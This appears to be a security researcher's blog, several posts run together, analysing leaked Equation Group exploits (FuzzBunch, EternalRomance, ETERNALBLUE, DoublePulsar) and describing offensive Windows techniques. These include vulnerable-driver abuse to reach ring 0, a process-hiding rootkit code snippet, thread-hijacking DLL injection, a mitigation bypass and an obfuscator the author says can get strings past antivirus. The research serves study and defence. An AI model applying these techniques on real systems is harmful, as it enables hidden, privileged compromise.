    But FuzzBunch includes a completely different exploit chain for Windows XP, which cannot use the same basic primitives (i.e. SMB2 and SrvNet.sys do not exist yet!). I discussed this version in depth at DerbyCon 8.0 (slides / video).

    tl;dw: The boot processor KPCR is static on Windows XP, and to gain shellcode execution the value of KPRCB.PROCESSOR_POWER_STATE.IdleFunction is overwritten.

    Payload Methodology

    As it turns out, the exploit was working just fine in the lab. What was failing was FuzzBunch's payload.

    The main stages of the ring 0 shellcode perform the following actions:

    1. Obtains &nt and &hal using the now-defunct KdVersionBlock trick
    2. Resolves some necessary function pointers, such as hal!HalInitializeProcessor
    3. Restores the boot processor KPCR/KPRCB which was corrupted during exploitation
    4. Runs DoublePulsar to backdoor the SMB service
    5. Gracefully resumes execution at a normal state (nt!PopProcessorIdle)

    Single Core Branch Anomaly

    Setting a couple hardware breakpoints on the IdleFunction switch and +0x170 into the shellcode (after a couple initial XOR/Base64 shellcode decoder stages), it is observed that a multi-core machine install branches differently than the single-core machine.


    kd> ba w 1 ffdffc50 "ba e 1 poi(ffdffc50)+0x170;g;"

    The multi-core machine has acquired a function pointer to hal!HalInitializeProcessor.

    Presumably, this function will be called to clean up the semi-corrupted KPRCB.

    The single-core machine did not find hal!HalInitializeProcessor... sub_547 instead returned NULL. The payload cannot continue, and will now self destruct by zeroing as much of itself out as it can and set up a ROP chain to free some memory and resume execution.

    Note: A successful shellcode execution will perform this action as well, just after installing DoublePulsar first.

    Root Cause Analysis

    The shellcode function sub_547 does not properly find hal!HalInitializeProcessor on single core CPU installs, and thus the entire payload is forced to abruptly abort. We will need to reverse engineer the shellcode function to figure out exactly why the payload is failing.

    There is an issue in the kernel shellcode: it does not take into account all of the different types of NT kernel executables that are available for Windows XP. Specifically, the multi-core processor version of NT works fine (i.e. ntkrnlamp.exe), but a single core install (i.e. ntoskrnl.exe) will fail. Likewise, there is a similar difference in halmacpi.dll vs halacpi.dll.

    The NT Red Herring

    The first operation that sub_547 performs is to obtain HAL function imports used by the NT executive. It finds HAL functions by first reading at offset 0x1040 into NT.

    On multi-core installs of Windows XP, this offset works as intended, and the shellcode finds hal!HalQueryRealTimeClock:

    However, on single-core installations this is not a HAL import table, but instead a string table:

    At first I figured this was probably the root cause. But it is a red herring, as there is correction code. The shellcode will check if the value at 0x1040 is an address in the range within HAL. If not it will subtract 0xc40 and start searching in increments of 0x40 for an address within the HAL range, until it reaches 0x1040 again.
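The correction logic described above can be sketched in C as follows. This is a reconstruction from the description only, not decompiled shellcode: the function and macro names are hypothetical, the NT image is modeled as a plain byte buffer, and pointers are read as 32-bit little-endian values since this is x86 Windows XP.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define FIRST_GUESS   0x1040u  /* offset tried first */
#define FALLBACK_BACK 0x0c40u  /* subtracted when the first guess fails */
#define STEP          0x40u    /* search increment */

/* Read a 32-bit little-endian value from the image. */
static uint32_t read_u32(const uint8_t *image, size_t off)
{
    return (uint32_t)image[off] | ((uint32_t)image[off + 1] << 8) |
           ((uint32_t)image[off + 2] << 16) | ((uint32_t)image[off + 3] << 24);
}

/* Is addr inside [hal_base, hal_base + hal_size)? */
static int in_hal(uint32_t addr, uint32_t hal_base, uint32_t hal_size)
{
    return addr >= hal_base && addr - hal_base < hal_size;
}

/* Returns the offset into NT where a pointer into HAL was found, or -1. */
long find_hal_import(const uint8_t *nt_image, size_t nt_len,
                     uint32_t hal_base, uint32_t hal_size)
{
    assert(nt_image != NULL && nt_len >= FIRST_GUESS + 4);
    if (in_hal(read_u32(nt_image, FIRST_GUESS), hal_base, hal_size))
        return (long)FIRST_GUESS;
    /* Fall back to 0x1040 - 0xc40 = 0x400 and walk forward in 0x40 steps
       until reaching 0x1040 again. */
    for (size_t off = FIRST_GUESS - FALLBACK_BACK; off < FIRST_GUESS; off += STEP) {
        if (in_hal(read_u32(nt_image, off), hal_base, hal_size))
            return (long)off;
    }
    return -1;
}
```

The fallback visits 49 candidate offsets (0x400 through 0x1000), a cheap way to cope with import tables that shift between kernel builds.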

    Eventually, the single-core version will find a HAL function, this time hal!HalCalibratePerformanceCounter:

    This all checks out and is fine, and shows that Equation Group did a good job here for determining different types of XP NT.

    HAL Variation Byte Table

    Now that a function within HAL has been found, the shellcode will attempt to locate hal!HalInitializeProcessor. It does so by carrying around a table (at shellcode offset 0x5e7) that contains a 1-byte length field followed by an expected sequence of bytes. The original discovered HAL function address is incremented in search of those bytes within the first 0x20 bytes of a new function.

    The desired 5 bytes are easily found in the multi-core version of HAL:

    However, the function on single-core HAL is much different.

    There is a similar mov instruction, but it is not a movzx. The byte sequence being searched for is not present in this function, and consequently the function is not discovered.
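A length-prefixed signature check of this kind can be sketched in C as below. The table layout (one length byte followed by the expected bytes) comes from the description above; everything else is an assumption for illustration, including the name find_signature and the choice to require the whole sequence to fit inside the first 0x20 bytes.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SEARCH_WINDOW 0x20u  /* only the start of a function is examined */

/* entry[0] is the signature length, entry[1..] are the expected bytes.
   Returns the offset of the match inside the window, or -1 if absent. */
long find_signature(const uint8_t *func, size_t func_len, const uint8_t *entry)
{
    assert(func != NULL && entry != NULL);
    size_t sig_len = entry[0];
    size_t window = func_len < SEARCH_WINDOW ? func_len : SEARCH_WINDOW;
    if (sig_len == 0 || sig_len > window)
        return -1;
    for (size_t i = 0; i + sig_len <= window; i++) {
        if (memcmp(func + i, entry + 1, sig_len) == 0)
            return (long)i;
    }
    return -1;
}
```

A single differing opcode byte, such as a mov where a movzx was expected, is enough for memcmp to fail at every position, which is the failure mode seen on the single-core HAL.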

    Conclusion

    It is well known (from many flame wars on Windows kernel development mailing lists) that searching for byte sequences to identify functions is unreliable across different versions and service packs of Windows. We have learned from this bug that exploit developers must also be careful to account for differences in single/multi-core and PAE variations of NTOSKRNL and HAL. In this case, the compiler decided to change one movzx instruction to a mov instruction and broke the entire payload.

    It is very curious that the KdVersionBlock trick and a byte sequence search are used to find functions in this payload. The Windows 7 payload finds NT and its exports in a seemingly more reliable way, by searching backwards in memory from the KPCR IDT and then parsing PE headers.

    This HAL function can be found through such other means (it appears readily exported by HAL). The corrupted KPCR can also be cleaned up in other ways. But those are both exercises for the reader.

    There is circumstantial evidence that primary FuzzBunch development was started in late 2001. It seems the payload may only have been written for and tested against multi-core processors. Perhaps this could be an indicator as to how recently the XP exploit was first written. Windows XP was broadly released on October 25, 2001. While this is the same year that IBM invented the first dual-core processor (POWER4), Intel and AMD would not have a similar offering until 2004 and 2005, respectively.

    This is yet another example of the evolution of these ETERNAL exploits. The Equation Group could have re-used the same exploit and payload primitives, yet chose to develop them using many different methodologies, perhaps so if one methodology was burned they could continue to reap the benefits of their exploit diversification. There is much esoteric Windows kernel internals knowledge that can be learned from studying these exploits.

    Dissecting a Bug in the EternalRomance Client (FuzzBunch)

    Note: This post does not explain the EternalRomance exploit chain, just a quirky bug in the Equation Group's client. For comprehensive exploit details, come see my presentation at DEF CON 26 (August 2018).


    Background

    In SMBv1, transactions are looked up via their User ID, Tree ID, Process ID, and Multiplex ID fields (UID, TID, PID, MID). This allows a client to have many transactions running at once, as needed. UID and TID are server-assigned, and PID is client-set but usually static. Generally, a client will only use the MID, set to a random value, to distinguish distinct transactions.

    Fish in a Barrel

    In EternalRomance, the MID must be set to a specific value (File ID). In order for the Equation Group to multiplex multiple transactions, the PID is used instead. The PID is what separates "dynamite sticks" in the Fish-In-A-Barrel heap feng shui.

    Figure 1. Fish in a Barrel (Red: Dynamite - Blue: Fish)

    Dynamite are transactions that can (ideally) cause overflow into another transaction. Sometimes a dynamite stick fails, simply because memory allocations can be volatile. In this case, EternalRomance should try the next stick.

    Discovering the Bug

    I had nop'd out the Srv.sys vulnerability being exploited using WinDbg so that I could observe the network traffic during failures, among various other reasons.

    I noticed that EternalRomance, during the grooming phase, sent dynamite sticks with PIDs 0, 1, and 2. However, it was only attempting to ignite one PID (dynamite stick) for every execution attempt: PID 0.

    This must be a mistake because igniting the same dynamite 3 times in a row does absolutely nothing but send superfluous network traffic with no change in result. A dynamite stick either works or it simply always will be a dud. And besides, why did it bother to send the other 2 dynamite in the first place?

    In fact, igniting the same dynamite stick multiple times is dangerous, because it increments a pointer each time, and the offset for the overwrite (a neighboring MID) stays static. On a side note, I also noticed the first exploit attempt always tries to overwrite two bytes, and all secondary dynamite attempts only overwrite one byte. Because of the way they set up the exploit, only a one byte overwrite is necessary (though two bytes won't hurt if it hits the right place). Another peculiarity.

    I messed around with the MaxExploitAttempt setting, which has a default value of 3. I set it to its maximum allowed of 16. Now the PID started at 3?

    This time, PIDs 3 through 15 were observed, and the last 3 exploit attempts sent PID=0.

    The Binary is Truth

    Well some debugging later, I figured out that the InitializeParameters() function (there are no symbols in the binary, but a few functions have helpful debug strings when handling error conditions) was allocating two arrays for the dynamite stick PIDs.


    unsigned int size = ExploitStruct->MaxExploitAttempts_0x4360;

    if (size <= 16)
    {
        ExploitStruct->PidTable_0x44a0 = (PWORD) TbMalloc(2 * size);
        ExploitStruct->PidTable_0x44a4 = (PWORD) TbMalloc(2 * size);
    }
    else
    {
        // print error message: too many max exploit attempts
    }

    TbMalloc is Equation Group's library function (tibe-2.dll) that just calls malloc() and then memset() to 0 (essentially calloc() but with one argument).

    I set a hardware breakpoint on the tables and noticed that in SmbRemoteApiTransactionGroom() (another unnamed function) there was the following logic. This function completes when the dynamite are initially sent (before any are ignited).


    if (DynamiteNum >= 3)
    {
        ExploitStruct->PidTable_0x44a4[DynamiteNum - 3] = DynamitePid;
    }
    else
    {
        ExploitStruct->PidTable_0x44a0[DynamiteNum] = DynamitePid;
    }

    Later, in DoWriteAndXExploitTransactionForRemApi(), the table where DynamiteNum >= 3 is used to source PIDs to ignite the dynamite.

    This means PidTable_0x44a4 is never given values when MaxExploitAttempts=3. Observe 3 shorts set to 0 at the address in the dump.

    And we can see the cause of the quirky network traffic starting at PID=3 when MaxExploitAttempts=16 (or any value greater than 3). Observe several shorts incrementing from 3, followed by three zeros.

    As far as I can tell, the PidTable_0x44a0 table (the one that holds the first 3 PIDs) simply isn't used, at least when tested against several versions of Windows XP and Server 2003.
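
The behavior described above can be reproduced with a small user-mode model. This is only a sketch: the struct and function names are hypothetical, calloc() stands in for TbMalloc, and it assumes each dynamite stick's PID equals its index, which matches the observed traffic but is not confirmed from the binary.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical stand-in for the two PID tables in ExploitStruct. */
typedef struct {
    unsigned max_attempts;
    uint16_t *first_table;   /* models PidTable_0x44a0 (DynamiteNum 0..2)  */
    uint16_t *ignite_table;  /* models PidTable_0x44a4 (DynamiteNum >= 3)  */
} groom_state;

/* Allocate both tables zero-filled, as TbMalloc is described to do. */
static int groom_init(groom_state *g, unsigned max_attempts)
{
    if (max_attempts > 16)
        return -1;  /* "too many max exploit attempts" */
    g->max_attempts = max_attempts;
    g->first_table = calloc(max_attempts, sizeof(uint16_t));
    g->ignite_table = calloc(max_attempts, sizeof(uint16_t));
    if (!g->first_table || !g->ignite_table) {
        free(g->first_table);
        free(g->ignite_table);
        return -1;
    }
    return 0;
}

/* Groom phase: record one PID per dynamite stick (assumed PID == index). */
static void groom_send(groom_state *g)
{
    for (unsigned n = 0; n < g->max_attempts; n++) {
        uint16_t pid = (uint16_t)n;
        if (n >= 3)
            g->ignite_table[n - 3] = pid;
        else
            g->first_table[n] = pid;
    }
}

/* Ignition phase: PIDs are sourced only from the second table. */
static uint16_t ignite_pid(const groom_state *g, unsigned attempt)
{
    return g->ignite_table[attempt];
}
```

With max_attempts set to 3, every call to ignite_pid() yields 0. With 16, attempts 0 through 12 yield PIDs 3 through 15 and the last three yield 0, which lines up with the captured traffic.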

    Conclusion

    This bug was probably missed, by both analysts and the Equation Group, for a few reasons:

    • Fish in a Barrel is only used for older versions of Windows (it's fixed in 7+)
    • It almost always succeeds the first time, as it is a rarely used pre-allocated heap
    • TbMalloc initializes all PIDs to 0, and the first dynamite PID is 0
    • The bug is quite subtle; I missed it several times because of assumptions

    The real mystery is why this logic exists for a second table when one of the two is never used.

    Obfuscated String/Shellcode Generator - Online Tool




    Shellcode will be cleaned of non-hex bytes using the following algorithm:


    s = s.replace(/(0x|0X)/g, "");
    s = s.replace(/[^A-Fa-f0-9]/g, "");
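
For readers working outside the browser, here is a rough C equivalent of the two replace calls. The function name clean_hex is made up for this sketch; it edits the string in place and is meant to mirror the regular expressions above, not to reproduce the tool's actual source.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Strip every "0x"/"0X" pair, then every non-hex character, in place.
 * Returns the length of the cleaned string. */
static size_t clean_hex(char *s)
{
    size_t kept = 0;

    /* Pass 1: drop "0x" and "0X", scanning left to right. */
    for (size_t i = 0; s[i] != '\0'; ) {
        if (s[i] == '0' && (s[i + 1] == 'x' || s[i + 1] == 'X'))
            i += 2;
        else
            s[kept++] = s[i++];
    }
    s[kept] = '\0';

    /* Pass 2: keep only [A-Fa-f0-9]. */
    size_t len = 0;
    for (size_t i = 0; i < kept; i++) {
        if (isxdigit((unsigned char)s[i]))
            s[len++] = s[i];
    }
    s[len] = '\0';
    return len;
}
```

Both "0x41, 0X42" and "\x90\xcc" style inputs reduce to plain hex digits this way.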

    See also: Overflow Exploit Pattern Generator - Online Tool.

    About this tool

    I'm preparing a malware reverse engineering class and building some crackmes for the CTF. I needed to encrypt/obfuscate flags so that they don't just show up with a strings tool. Sure you can crib the assembly and rig this out pretty easily, but the point of these challenges is to instead solve them through behavioral analysis rather than initial assessment. I'm sure this tool will also be good for getting some dirty strings past AV.

    Sadly, I'm still not satisfied with the state of C++17 template magic for compile-time string obfuscation or I wouldn't have had to make this. I remember a website that used to do this similar thing for free but at some point it moved to a pay model. I think maybe it had a few extra features?

    This instruments pretty nicely though in that an ADD won't be immediately followed by a SUB, which is basically a NOP. Same with XOR, SHIFT, etc. It can also MORPH the output even more by using the current string iteration in the arithmetic to add entropy.
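
To give a feel for the idea, here is a minimal sketch of an index-dependent XOR-then-ADD transform and its inverse. It is not the generator's output: the function names, the operation order, and the constants (7 and 0x3d) are all invented for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical transform: XOR with (key + i), then ADD (i * 7 + 0x3d).
 * Mixing the index into both steps keeps repeated characters from
 * producing repeated output bytes. */
static void obfuscate(uint8_t *buf, size_t len, uint8_t key)
{
    for (size_t i = 0; i < len; i++) {
        uint8_t c = buf[i];
        c ^= (uint8_t)(key + i);
        c = (uint8_t)(c + (uint8_t)(i * 7u + 0x3du));
        buf[i] = c;
    }
}

/* Inverse: undo the ADD first, then the XOR. */
static void deobfuscate(uint8_t *buf, size_t len, uint8_t key)
{
    for (size_t i = 0; i < len; i++) {
        uint8_t c = buf[i];
        c = (uint8_t)(c - (uint8_t)(i * 7u + 0x3du));
        c ^= (uint8_t)(key + i);
        buf[i] = c;
    }
}
```

In a crackme, only the obfuscated bytes and the decode loop would be compiled in, so the flag never appears as a contiguous string in the binary.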

    Only ASCII/ANSI is supported because if there's one thing I dislike more than JavaScript it's working with UCS2-LE encodings. And the only language it generates is raw C/C++ because those are the languages you would most likely need something like this for. Post a comment if there's a bug, and feel free to rip the code out if you want to.

    Puppet Strings - Dirty Secret for Windows Ring 0 Code Execution

    Update July 3, 2017: FuzzySec has also previously written some info about this.

    Ever since I began reverse engineering Shadow Brokers dumps [1] [2] [3], I've gotten into the habit of codenaming my projects. This trick is called Puppet Strings, and it lets you hitch a free ride into Ring 0 (kernel mode) on Windows.

    Some nation-state malware, such as Backdoor.Remsec by the ProjectSauron/Strider APT and Trojan.Turla by the Turla APT, performs a similar operation. However, the traditional nation-state modus operandi involves 0-day exploitation.

    But why waste 0-days when you can use kn0wn-days?

    Premise

    1. If you're running as an elevated admin, you're allowed to load (signed) drivers.
      • Local users are almost always admins.
      • UAC is known to be fundamentally broken.
    2. Load any (signed) driver with a kn0wn code execution vulnerability and exploit it.
      • It's a fairly obvious idea, and elementary to perform.
      • Windows does not have robust certificate revocation.
        • Thus, the DSE trust model is fundamentally broken!

    Ordinarily, Ring 0 is forbidden unless you have an approved Extended Validation (EV) Code-Signing Certificate (out of reach for most, especially for malicious purposes). There is a "Driver Signature Enforcement" (DSE) security feature present in all modern 64-bit versions of Windows.

    This enforcement can only be "officially" bypassed in two ways: attaching a kernel debugger or configuration at the advanced boot options menu. While these are common procedures for driver developers, they are highly-atypical actions for the average user.

    That's right, I'm talking about simply loading high-profile vulnerable drivers like capcom.sys:

    oh dear god this capcom.sys has an ioctl that disables smep and calls a provided function pointer, and sets SMEP back what even pic.twitter.com/jBCXO7YtNe

    - slipstream/RoL (@TheWack0lian), September 23, 2016

    Originally introduced in September 2016 as a form of video game anti-cheat, it was quickly discovered that the capcom.sys driver has an ioctl which disables Supervisor Mode Execution Prevention (SMEP) and executes a provided Ring 3 (user mode) function pointer with Ring 0 privileges. It's even kind enough to pass you a function pointer to MmGetSystemRoutineAddress(), which is basically like GetProcAddress() but for ntoskrnl.exe exports.

    The unfortunate part is it can still be easily loaded and exploited to this day.

    My opinion: file reputation for signed binaries should factor in cert validity period, revocation, digest algorithm, and file prevalence.

    - Matt Graeber (@mattifestation), June 24, 2017

    If a driver is signed with a valid timestamp, it also doesn't matter if the certificate has expired, as long as it isn't revoked. This trick is only possible because the Microsoft and root CA mechanisms for revoking driver signatures seem inadequate. This halfhearted approach violates the trust model that public key infrastructure is supposed to be built upon, as defined in the X.509 standard. Perhaps, like UAC, it is not a security boundary?

    Capcom.sys has been around for almost a year, and is easily one of the most well-known and simplest driver exploits of all time.

    While this driver is flagged 15/61 on VirusTotal, I have a personal list of known-vulnerable drivers that are 0/61 detection. They aren't too hard to find if you keep your eyes open to netsec news.

    Proof of Concept

    Code is available on GitHub at zerosum0x0/puppetstrings. To run it, you will need to independently obtain the capcom.sys driver (I don't want to deal with weird licensing issues).

    Test system was Windows 10 x64 Redstone 3 (Insider pre-release), just to show the new Driver Signing Policies (and its list of exceptions) introduced in Redstone 1 do not address this issue. This works on all versions of Windows if you update the EPROCESS.ActiveProcessLinks offset.

    1: kd> dt !_EPROCESS ActiveProcessLinks
    +0x2e8 ActiveProcessLinks : _LIST_ENTRY

    For the PoC, I had to do something relatively malicious to get the point across. Getting to Ring 0 with this technique is simple; doing something interesting once there is more difficult (e.g. we can already load drivers, and the usual SYSTEM shell can be obtained through less dangerous methods).

    I load capcom.sys, pass it a function which performs the old rootkit technique of unlinking the current process from the EPROCESS.ActiveProcessLinks circularly-linked list, and then unload capcom.sys. This methodology is instant and makes the current process not show up in user mode tools like tasklist.exe.


    static void rootkit_unlink(PEPROCESS pProcess)
    {
        static const DWORD WIN10_RS3_OFFSET = 0x2e8;

        PLIST_ENTRY plist =
            (PLIST_ENTRY)((LPBYTE)pProcess + WIN10_RS3_OFFSET);

        // make both neighbors skip over this entry
        *((DWORD64*)plist->Blink) = (DWORD64)plist->Flink;
        *((DWORD64*)plist->Flink + 1) = (DWORD64)plist->Blink;

        // point the entry at itself
        plist->Flink = (PLIST_ENTRY) &(plist->Flink);
        plist->Blink = (PLIST_ENTRY) &(plist->Flink);
    }

    Of course, doing this in a modern rootkit is foolish, as PatchGuard has at least 4 different process list checks (CRITICAL_STRUCTURE_CORRUPTION Bug Check Arg4 = 4, 5, 1A, and 1B). But you can get experimental and think of something else cool to do, as you enjoy all of the freedoms Ring 0 brings.
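
The pointer surgery is easier to follow on a plain user-mode list. The sketch below uses a hypothetical list_entry type with the same two-pointer layout as LIST_ENTRY; it runs anywhere and touches no kernel structures.

```c
#include <assert.h>
#include <stddef.h>

/* Same shape as LIST_ENTRY: forward link first, back link second. */
typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

/* An empty circular list is a head that points at itself. */
static void list_init(list_entry *head)
{
    head->flink = head;
    head->blink = head;
}

static void list_insert_tail(list_entry *head, list_entry *e)
{
    e->flink = head;
    e->blink = head->blink;
    head->blink->flink = e;
    head->blink = e;
}

/* Unlink e so that walkers skip it, then make e self-referential. */
static void list_unlink(list_entry *e)
{
    e->blink->flink = e->flink;
    e->flink->blink = e->blink;
    e->flink = e;
    e->blink = e;
}

/* Count entries by walking forward from the head. */
static size_t list_count(const list_entry *head)
{
    size_t n = 0;
    for (const list_entry *e = head->flink; e != head; e = e->flink)
        n++;
    return n;
}
```

After list_unlink(), anything that enumerates the list from the head no longer sees the entry, which is why the process disappears from tools that walk ActiveProcessLinks.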

    DOUBLEPULSAR showed us there's a lot of creative ideas to run in the kernel, even outside of a driver context. DSEFix exploits the same vulnerable VirtualBox driver used by Trojan.Turla to disable Driver Signature Enforcement entirely. It's even possible to use some undocumented features to create a reflectively-loaded driver, if one were so inclined...

    If you want to learn more about techniques like this, come to the Advanced Windows Post-Exploitation / Malware Forward Engineering DEF CON 25 workshop.

    ThreadContinue - Reflective DLL Injection Using SetThreadContext() and NtContinue()

    In the attempt to evade AV, attackers go to great lengths to avoid the common reflective injection code execution function, CreateRemoteThread(). Alternative techniques include native API (ntdll) thread creation and user APCs (necessary for SysWow64->x64), etc.

    This technique uses SetThreadContext() to change a selected thread's registers, and performs a restoration process with NtContinue(). This means the hijacked thread can keep doing whatever it was doing, which may be a critical function of the injected application.

    You'll notice the PoC (x64 only, #lazy) is using the common VirtualAllocEx() and WriteProcessMemory() functions. But instead of creating a new remote thread, we piggyback off of an existing one, and restore the original context when we're done with it. This can be done locally (current process) and remotely (target process).

    Stage 0: Thread Hijack

    Code can be found in hijack/hijack.c

    1. Select a target PID.
    2. Process is opened, and any thread is found.
    3. Thread is suspended, and thread context (CPU registers) copied.
    4. Memory allocated in remote process for reflective DLL.
    5. Memory allocated in remote process for thread context.
    6. Set the thread context stack pointer to a lower address.
    7. Change thread context with SetThreadContext().
    8. Resume the thread execution.

    Stage 1: Reflective Restore

    Code can be found in dll/ReflectiveDll.c

    1. Normal reflective DLL injection takes place.
    2. Optional: Spawn new thread locally for a primary payload.
    3. Optional: Thread is restored with NtContinue(), using the passed-in previous context.

    You can go from x64->SysWow64 using Wow64SetThreadContext(), but not the other way around. I unfortunately did not observe possible sorcery for SysWow64->x64.

    One major hiccup to overcome, in x64 mode, is that the register RCX (function param 1) is volatile even across a SetThreadContext() call. To overcome this, I stored the context pointer in a cave (in this case, the DOS header). Luckily, NtContinue() allows setting the volatile registers, so there are no issues in the restoration process; otherwise it would have needed a hacky code cave inserted or something.


    // retrieve CONTEXT from DOS header cave
    lpParameter = (LPVOID)*((PULONG_PTR)((LPBYTE)uiLibraryAddress+2));
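
As a portable illustration of the cave idea, the sketch below stashes a pointer two bytes into a fake 64-byte DOS header (right after the "MZ" magic) and reads it back. The helper names are hypothetical, and everything happens in one process here, whereas the PoC writes the value into the remote process.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define CAVE_OFFSET 2  /* first byte after the 2-byte "MZ" magic */

/* Store a pointer-sized value inside the header. memcpy is used because
 * offset 2 is not suitably aligned for a direct pointer store. */
static void cave_store(uint8_t *image_base, const void *ptr)
{
    uintptr_t value = (uintptr_t)ptr;
    memcpy(image_base + CAVE_OFFSET, &value, sizeof value);
}

/* Read the pointer back, as the loader does once it knows its base. */
static void *cave_load(const uint8_t *image_base)
{
    uintptr_t value;
    memcpy(&value, image_base + CAVE_OFFSET, sizeof value);
    return (void *)value;
}
```

On x64 the 8-byte value occupies header offsets 2 through 9, leaving the magic at offset 0 and e_lfanew at offset 0x3c untouched.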

    Another issue is we could corrupt the original thread's stack. I subtracted 0x2000 from RSP to find a new spot to spam up.

    I've seen similar (but non-successful) techniques for code injection, though I found only a small amount of related information [1] [2]. These techniques were not interested in performing proper cleanup of the stolen thread, which is not practical in many circumstances. This is essentially the same process that RtlRemoteCall() follows. As such, there may be issues for threads in a wait state returning an incorrect status? None of these sources uses reflective restoration.

    As user mode API is highly explored territory, this may not be an original technique. If so, take the example for what it is ([relatively] clean code with academic explanation) and chalk it up to multiple discovery. Leave flames, spam, and questions in the comments!

    If you want to learn more about techniques like this, come to the Advanced Windows Post-Exploitation / Malware Forward Engineering DEF CON 25 workshop.

    Proposed Windows 10 EAF/EMET "Bypass" for Reflective DLL Injection

    Windows 10 Redstone 3 (Fall Creator's Update) is adding Exploit Guard, bringing EMET's Export Address Table Access Filtering (EAF) mitigation, among others, to the system. We are still living in a golden era of Windows exploitation and post-exploitation, compared to the way things will be once the world moves onto Windows 10. This is a mitigation that will need to be bypassed sooner or later.

    EAF sets hardware breakpoints that check for legitimate access when the function exports of KERNEL32.DLL and NTDLL.DLL are read. It does this by checking if the offending caller code is part of a legitimately loaded module (which reflective DLL injection is not). EAF+ adds another breakpoint for KERNELBASE.DLL. One bypass was searching a DLL such as USER32.DLL for its imports, however Windows 10 will also be adding the brand new Import Address Table Access Filtering (IAF).

    So how can we avoid the EAF exploit mitigation? Simple, reflective DLLs, just like normal DLLs, take an LPVOID lpParam. Currently, the loader code does nothing with this besides forwarding it to DllMain. We can allocate and pass a pointer to this struct.


    #pragma pack(1)
    typedef struct _REFLECTIVE_LOADER_INFO
    {
        LPVOID lpRealParam;
        LPVOID lpDosHeader;
        FARPROC fLoadLibraryA;
        FARPROC fGetProcAddress;
        FARPROC fVirtualAlloc;
        FARPROC fNtFlushInstructionCache;
        FARPROC fVirtualLock;
    } REFLECTIVE_LOADER_INFO, *PREFLECTIVE_LOADER_INFO;

    Instead of performing two allocations, we could also shove this information in a code cave at the start of the ReflectiveLoader(), or in the DOS headers. I don't think DOS headers are viable for Metasploit, which inserts shellcode there (that does some MSF setup and jumps to ReflectiveLoader(), so you can start execution at offset 0), but perhaps in the stub between the DOS->e_lfanew field and the NT headers.

    Reflective DLLs search backwards in memory for their base MZ DOS header address, requiring a second function with the _ReturnAddress() intrinsic. We know this information and can avoid the entire process (note: method not possible if we shove in DOS headers).

    Likewise, the addresses for the APIs we need are also known information before the reflective loader is called. While it's true that there is full ASLR for most loaded DLL modules these days, KERNEL32.DLL and NTDLL.DLL are only randomized upon system boot. Unless we do something weird, the addresses we see in the injecting process will be the same as in the injected process.

    In order to get code execution to the point of being able to inject code in another process, you need to be inside of a valid context or previously have necessary function pointers anyways. Since EAF does not alert from a valid context, obtaining pointers in the first place should not be an issue. From there, chaining this method with migration is not a problem.

    This kind of removes some of the novelty from reflective DLL injection. It's known that instead of self-loading, it's possible to perform the loader code from the injector (this method is seen in powerkatz.dll [PowerShell Empire's Mimikatz] and process hollowing). However, recently there was a circumstance where I was forced to use reflective injection due to the constraints I was working within. More on that at a later time, but reflective DLL injection, even with this extra step, still has plenty of uses and is highly coupled to the tools we're currently using... This is a simple fix when the issue comes up.

    Talk/Workshop at DEF CON 25

    Just got the word that @aleph___naught and I will be presenting a talk and workshop at DEF CON 25.

    Our talk is a post-exploitation RAT using the Windows Script Host. Executing completely from memory with tons of ways to fork to shellcode. Will contain some original research (with the help of @JennaMagius and @The_Naterz) and amazing prior work by @tiraniddo, @subTee, and @enigma0x3. Cue @mattifestation interjecting with something about app whitelisting!

    The workshop is not just the tactics, but the code and reverse engineering behind all the stuff in penetration testing rootkits such as Meterpreter and PowerShell Empire. It will include a deep look into Windows internals and some new concepts and ideas not yet present in the normal set of tools.

    All slides and code will be posted at the end of DEF CON.

    ETERNALBLUE: Exploit Analysis and Port to Microsoft Windows 10

    The whitepaper for the research done on ETERNALBLUE by @JennaMagius and me has been completed.

    Be sure to check the bibliography for other great writeups of the pool grooming and overflow process. This paper breaks some new ground by explaining the execution chain after the memory corrupting overwrite is complete.

    PDF Download

    Errata

    r5hjrtgher pointed out the vulnerable code section did not appear accurate. Upon further investigation, we discovered this was correct. The confusion was because unlike the version of Windows Server 2008 we originally reversed, on Windows 10 the Srv!SrvOs2FeaListSizeToNt function was inlined inside Srv!SrvOs2FeaListToNt. We saw a similar code path and hastily concluded it was the vulnerable one. Narrowing the exact location was not necessary to port the exploit.

    Here is the correct vulnerable code path for Windows 10 version 1511:

    How the vulnerability was patched with MS17-010:

    The 16-bit registers were replaced with 32-bit versions, to prevent the mathematical miscalculation leading to buffer overflow.
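
A toy model of this class of bug, under the assumption that the miscalculation comes from a 32-bit size field being updated through a 16-bit store: only the low half changes, so a stale upper half survives. The function names and the sample values are illustrative and are not taken from the disassembly.

```c
#include <assert.h>
#include <stdint.h>

/* Pre-patch model: a 16-bit store rewrites only the low word of the field,
 * leaving whatever was in the high word. */
static uint32_t update_size_16(uint32_t field, uint32_t new_size)
{
    return (field & 0xffff0000u) | (new_size & 0x0000ffffu);
}

/* Post-patch model: the full 32-bit value is written. */
static uint32_t update_size_32(uint32_t field, uint32_t new_size)
{
    (void)field;
    return new_size;
}
```

For example, shrinking a field that held 0x10000 down to 0xff5d with the 16-bit store leaves 0x1ff5d, a size larger than the original, while the 32-bit store leaves the intended 0xff5d.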

    Minor note: there was also extra assembly and mitigations added in the code paths leading to this.

    To all the foreign intelligence agencies trying to spear phish I've already deleted all my data! :tinfoil:

    DoublePulsar Initial SMB Backdoor Ring 0 Shellcode Analysis

    One week ago today, the Shadow Brokers (an unknown hacking entity) leaked the Equation Group's (NSA) FuzzBunch software, an exploitation framework similar to Metasploit. In the framework were several unauthenticated, remote exploits for Windows (such as the exploits codenamed EternalBlue, EternalRomance, and EternalSynergy). Many of the vulnerabilities that are exploited were fixed in MS17-010, perhaps the most critical Windows patch in almost a decade.

    Side note: You can use my MS17-010 Metasploit auxiliary module to scan your networks for systems missing this patch (uncredentialed and non-intrusive). If a missing patch is found, it will also check for an existing DoublePulsar infection.

    Introduction

    For those unfamiliar, DoublePulsar is the primary payload used in SMB and RDP exploits in FuzzBunch. Analysis was performed using the EternalBlue SMBv1/SMBv2 exploit against Windows Server 2008 R2 SP1 x64.

